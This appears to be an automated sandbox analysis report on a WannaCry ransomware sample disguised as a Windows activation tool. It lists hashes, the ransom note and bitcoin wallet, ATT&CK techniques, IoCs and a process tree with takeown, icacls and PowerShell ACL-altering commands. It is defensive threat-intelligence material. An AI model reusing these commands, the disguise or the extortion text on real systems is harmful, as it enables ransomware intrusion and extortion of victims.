wannacry | 95978fcb67a1110a96f207d752ed46ef5fe0a150247ddd043bc5ae6ed67fc4ac

Analysis

max time kernel
899s
max time network
875s
platform
windows10-2004_x64
resource
win10v2004-20241007-fr
resource tags

arch:x64arch:x86image:win10v2004-20241007-frlocale:fr-fros:windows10-2004-x64systemwindows
submitted
01-01-2025 13:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

spoofer/Activation.exe
Size

703KB
MD5

8c1d40db6464fd098716a317486db961
SHA1

4b4d82e0a91f11e1348488b9e9edd43697d9db67
SHA256

7b9723c3ca58ecdde9af2dd2215e00fa7c7692e960242d9c6b2e80ab45fc90d5
SHA512

16c868e227c4928dfcc116ba6e9d93c22418936cad625cd48645abb96229d31ee1329105097d2e7f36f6382e214dfd54e1eb92842bcc45edd978f64da6c4c6dd
SSDEEP

6144:5UPAUV624Zk+nC+f8Z7DgMvVXYNlV8F/2/6utZeiXhOy8oMmkCOutH5BysohXWwm:5mV620nN8ZoAutZeiXhOBuOaBToo4ZY

Score

10^/10

wannacry defense_evasion discovery execution exploit impact persistence ransomware worm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Wannacry family
wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Possible privilege escalation attempt 4 IoCs

exploit

pid	Process
3280	takeown.exe
2044	icacls.exe
4640	icacls.exe
2988	icacls.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDED82.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDED98.tmp	WannaCry.EXE

Executes dropped EXE 64 IoCs

pid	Process
5196	taskdl.exe
5456	@[email protected]
5556	@[email protected]
5612	taskhsvc.exe
4100	taskdl.exe
4908	taskse.exe
2552	@[email protected]
2020	taskdl.exe
1536	taskse.exe
5428	@[email protected]
2984	taskse.exe
3112	@[email protected]
1016	taskdl.exe
1420	taskse.exe
5796	@[email protected]
5772	taskdl.exe
468	taskse.exe
5640	@[email protected]
3292	taskdl.exe
5056	taskse.exe
4812	@[email protected]
1904	taskdl.exe
1872	taskse.exe
2320	@[email protected]
5924	taskdl.exe
1276	taskse.exe
4344	@[email protected]
4500	taskdl.exe
3516	taskse.exe
2328	@[email protected]
4968	taskdl.exe
4592	taskse.exe
2468	@[email protected]
6020	taskdl.exe
780	taskse.exe
4704	@[email protected]
1468	taskdl.exe
3256	taskse.exe
3320	@[email protected]
3456	taskdl.exe
5808	taskse.exe
940	@[email protected]
3804	taskdl.exe
5484	taskse.exe
5424	@[email protected]
5868	taskdl.exe
4308	taskse.exe
4224	@[email protected]
3640	taskdl.exe
5972	taskse.exe
2232	@[email protected]
1500	taskdl.exe
4472	taskse.exe
3708	@[email protected]
5876	taskdl.exe
1904	taskse.exe
1040	@[email protected]
1048	taskdl.exe
3156	taskse.exe
3456	@[email protected]
2988	taskdl.exe
3900	taskse.exe
3396	@[email protected]
4004	taskdl.exe

Loads dropped DLL 7 IoCs

pid	Process
5612	taskhsvc.exe
5612	taskhsvc.exe
5612	taskhsvc.exe
5612	taskhsvc.exe
5612	taskhsvc.exe
5612	taskhsvc.exe
5612	taskhsvc.exe

Modifies file permissions 1 TTPs 4 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3280	takeown.exe
2044	icacls.exe
4640	icacls.exe
2988	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tvhpejndbjx409 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_WannaCry-main.zip\\WannaCry-main\\tasksche.exe\""	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4592	powershell.exe
3924	powershell.exe
3972	powershell.exe
2040	powershell.exe
3432	powershell.exe
2740	powershell.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
83	camo.githubusercontent.com
84	camo.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	WannaCry.EXE

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\IME\permissions.bat	Activation.exe
File created	C:\Windows\IME\reset.bat	Activation.exe
File created	C:\Windows\IME\activator.bat	Activation.exe
File opened for modification	C:\Windows\INF\display.PNF	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5920	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133802114500323289"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2352	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
2040	powershell.exe
2040	powershell.exe
3432	powershell.exe
3432	powershell.exe
2740	powershell.exe
2740	powershell.exe
4592	powershell.exe
4592	powershell.exe
3924	powershell.exe
3924	powershell.exe
3972	powershell.exe
3972	powershell.exe
3432	msedge.exe
3432	msedge.exe
4352	msedge.exe
4352	msedge.exe
3256	identity_helper.exe
3256	identity_helper.exe
4852	msedge.exe
4852	msedge.exe
5612	taskhsvc.exe
5612	taskhsvc.exe
5612	taskhsvc.exe
5612	taskhsvc.exe
5612	taskhsvc.exe
5612	taskhsvc.exe
5432	chrome.exe
5432	chrome.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
2856	chrome.exe
2856	chrome.exe
2856	chrome.exe
2856	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs

pid	Process
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
5432	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	3280	takeown.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	3924	powershell.exe
Token: SeBackupPrivilege	3924	powershell.exe
Token: SeBackupPrivilege	3924	powershell.exe
Token: SeRestorePrivilege	3924	powershell.exe
Token: SeSecurityPrivilege	3924	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeBackupPrivilege	3972	powershell.exe
Token: SeBackupPrivilege	3972	powershell.exe
Token: SeRestorePrivilege	3972	powershell.exe
Token: SeSecurityPrivilege	3972	powershell.exe
Token: SeIncreaseQuotaPrivilege	5740	WMIC.exe
Token: SeSecurityPrivilege	5740	WMIC.exe
Token: SeTakeOwnershipPrivilege	5740	WMIC.exe
Token: SeLoadDriverPrivilege	5740	WMIC.exe
Token: SeSystemProfilePrivilege	5740	WMIC.exe
Token: SeSystemtimePrivilege	5740	WMIC.exe
Token: SeProfSingleProcessPrivilege	5740	WMIC.exe
Token: SeIncBasePriorityPrivilege	5740	WMIC.exe
Token: SeCreatePagefilePrivilege	5740	WMIC.exe
Token: SeBackupPrivilege	5740	WMIC.exe
Token: SeRestorePrivilege	5740	WMIC.exe
Token: SeShutdownPrivilege	5740	WMIC.exe
Token: SeDebugPrivilege	5740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5740	WMIC.exe
Token: SeRemoteShutdownPrivilege	5740	WMIC.exe
Token: SeUndockPrivilege	5740	WMIC.exe
Token: SeManageVolumePrivilege	5740	WMIC.exe
Token: 33	5740	WMIC.exe
Token: 34	5740	WMIC.exe
Token: 35	5740	WMIC.exe
Token: 36	5740	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5740	WMIC.exe
Token: SeSecurityPrivilege	5740	WMIC.exe
Token: SeTakeOwnershipPrivilege	5740	WMIC.exe
Token: SeLoadDriverPrivilege	5740	WMIC.exe
Token: SeSystemProfilePrivilege	5740	WMIC.exe
Token: SeSystemtimePrivilege	5740	WMIC.exe
Token: SeProfSingleProcessPrivilege	5740	WMIC.exe
Token: SeIncBasePriorityPrivilege	5740	WMIC.exe
Token: SeCreatePagefilePrivilege	5740	WMIC.exe
Token: SeBackupPrivilege	5740	WMIC.exe
Token: SeRestorePrivilege	5740	WMIC.exe
Token: SeShutdownPrivilege	5740	WMIC.exe
Token: SeDebugPrivilege	5740	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5740	WMIC.exe
Token: SeRemoteShutdownPrivilege	5740	WMIC.exe
Token: SeUndockPrivilege	5740	WMIC.exe
Token: SeManageVolumePrivilege	5740	WMIC.exe
Token: 33	5740	WMIC.exe
Token: 34	5740	WMIC.exe
Token: 35	5740	WMIC.exe
Token: 36	5740	WMIC.exe
Token: SeBackupPrivilege	5904	vssvc.exe
Token: SeRestorePrivilege	5904	vssvc.exe
Token: SeAuditPrivilege	5904	vssvc.exe
Token: SeTcbPrivilege	4908	taskse.exe
Token: SeTcbPrivilege	4908	taskse.exe
Token: SeShutdownPrivilege	5432	chrome.exe
Token: SeCreatePagefilePrivilege	5432	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
5432	chrome.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe
4352	msedge.exe

Suspicious use of SetWindowsHookEx 32 IoCs

pid	Process
5456	@[email protected]
5456	@[email protected]
5556	@[email protected]
5556	@[email protected]
2552	@[email protected]
2552	@[email protected]
5428	@[email protected]
3112	@[email protected]
5796	@[email protected]
5640	@[email protected]
4812	@[email protected]
2320	@[email protected]
4344	@[email protected]
2328	@[email protected]
2468	@[email protected]
4704	@[email protected]
3320	@[email protected]
940	@[email protected]
5424	@[email protected]
4224	@[email protected]
2232	@[email protected]
3708	@[email protected]
1040	@[email protected]
3456	@[email protected]
3396	@[email protected]
3924	@[email protected]
5800	@[email protected]
4152	@[email protected]
4476	@[email protected]
4448	@[email protected]
780	@[email protected]
2756	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 552 wrote to memory of 4268	552	Activation.exe	83
PID 552 wrote to memory of 4268	552	Activation.exe	83
PID 552 wrote to memory of 1460	552	Activation.exe	84
PID 552 wrote to memory of 1460	552	Activation.exe	84
PID 552 wrote to memory of 2512	552	Activation.exe	85
PID 552 wrote to memory of 2512	552	Activation.exe	85
PID 552 wrote to memory of 4424	552	Activation.exe	86
PID 552 wrote to memory of 4424	552	Activation.exe	86
PID 552 wrote to memory of 1064	552	Activation.exe	87
PID 552 wrote to memory of 1064	552	Activation.exe	87
PID 552 wrote to memory of 2904	552	Activation.exe	88
PID 552 wrote to memory of 2904	552	Activation.exe	88
PID 552 wrote to memory of 3500	552	Activation.exe	89
PID 552 wrote to memory of 3500	552	Activation.exe	89
PID 552 wrote to memory of 3376	552	Activation.exe	90
PID 552 wrote to memory of 3376	552	Activation.exe	90
PID 552 wrote to memory of 2296	552	Activation.exe	91
PID 552 wrote to memory of 2296	552	Activation.exe	91
PID 552 wrote to memory of 1252	552	Activation.exe	92
PID 552 wrote to memory of 1252	552	Activation.exe	92
PID 552 wrote to memory of 1500	552	Activation.exe	93
PID 552 wrote to memory of 1500	552	Activation.exe	93
PID 552 wrote to memory of 2180	552	Activation.exe	94
PID 552 wrote to memory of 2180	552	Activation.exe	94
PID 552 wrote to memory of 3372	552	Activation.exe	101
PID 552 wrote to memory of 3372	552	Activation.exe	101
PID 552 wrote to memory of 4832	552	Activation.exe	102
PID 552 wrote to memory of 4832	552	Activation.exe	102
PID 552 wrote to memory of 4000	552	Activation.exe	103
PID 552 wrote to memory of 4000	552	Activation.exe	103
PID 552 wrote to memory of 2272	552	Activation.exe	104
PID 552 wrote to memory of 2272	552	Activation.exe	104
PID 2272 wrote to memory of 3280	2272	cmd.exe	105
PID 2272 wrote to memory of 3280	2272	cmd.exe	105
PID 2272 wrote to memory of 2044	2272	cmd.exe	106
PID 2272 wrote to memory of 2044	2272	cmd.exe	106
PID 2272 wrote to memory of 4640	2272	cmd.exe	107
PID 2272 wrote to memory of 4640	2272	cmd.exe	107
PID 552 wrote to memory of 1136	552	Activation.exe	108
PID 552 wrote to memory of 1136	552	Activation.exe	108
PID 552 wrote to memory of 4040	552	Activation.exe	109
PID 552 wrote to memory of 4040	552	Activation.exe	109
PID 552 wrote to memory of 1368	552	Activation.exe	110
PID 552 wrote to memory of 1368	552	Activation.exe	110
PID 1368 wrote to memory of 2040	1368	cmd.exe	111
PID 1368 wrote to memory of 2040	1368	cmd.exe	111
PID 552 wrote to memory of 3876	552	Activation.exe	112
PID 552 wrote to memory of 3876	552	Activation.exe	112
PID 3876 wrote to memory of 3432	3876	cmd.exe	113
PID 3876 wrote to memory of 3432	3876	cmd.exe	113
PID 552 wrote to memory of 5036	552	Activation.exe	114
PID 552 wrote to memory of 5036	552	Activation.exe	114
PID 5036 wrote to memory of 2740	5036	cmd.exe	115
PID 5036 wrote to memory of 2740	5036	cmd.exe	115
PID 552 wrote to memory of 4812	552	Activation.exe	118
PID 552 wrote to memory of 4812	552	Activation.exe	118
PID 4812 wrote to memory of 4592	4812	cmd.exe	119
PID 4812 wrote to memory of 4592	4812	cmd.exe	119
PID 552 wrote to memory of 3300	552	Activation.exe	120
PID 552 wrote to memory of 3300	552	Activation.exe	120
PID 3300 wrote to memory of 3924	3300	cmd.exe	121
PID 3300 wrote to memory of 3924	3300	cmd.exe	121
PID 552 wrote to memory of 1752	552	Activation.exe	122
PID 552 wrote to memory of 1752	552	Activation.exe	122

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5888	attrib.exe
2856	attrib.exe

C:\Users\Admin\AppData\Local\Temp\spoofer\Activation.exe
"C:\Users\Admin\AppData\Local\Temp\spoofer\Activation.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c title Windows Activation Fix
  2⤵
  PID:4268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color 0b
  2⤵
  PID:1460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo.
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo This tool will fix your Windows Activation
  2⤵
  PID:4424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo.
  2⤵
  PID:1064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo.
  2⤵
  PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo.
  2⤵
  PID:3500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo Made by skidaim#0607
  2⤵
  PID:3376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo.
  2⤵
  PID:2296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo.
  2⤵
  PID:1252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo.
  2⤵
  PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause
  2⤵
  PID:2180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo Starting...
  2⤵
  PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c %windir%\IME\permissions.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2272
- - C:\Windows\system32\takeown.exe
    takeown /F C:\Windows\System32\sppsvc.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3280
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32 /grant administrators:F /T
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2044
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\spp /grant administrators:F /T
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo Applying permissions...
  2⤵
  PID:4040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell.exe -c $acl = Get-Acl 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform'; $rule = New-Object System.Security.AccessControl.RegistryAccessRule ('NT Service\sppsvc','FullControl','ContainerInherit, ObjectInherit','None','Allow'); $acl.SetAccessRule($rule); Set-Acl -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -AclObject $acl
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
